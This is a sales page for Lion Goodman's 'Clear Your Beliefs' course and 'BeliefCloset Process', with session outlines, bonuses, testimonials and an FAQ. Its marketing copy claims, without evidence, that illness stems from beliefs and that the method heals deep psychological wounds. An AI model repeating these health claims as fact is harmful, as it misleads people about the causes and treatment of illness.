style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a 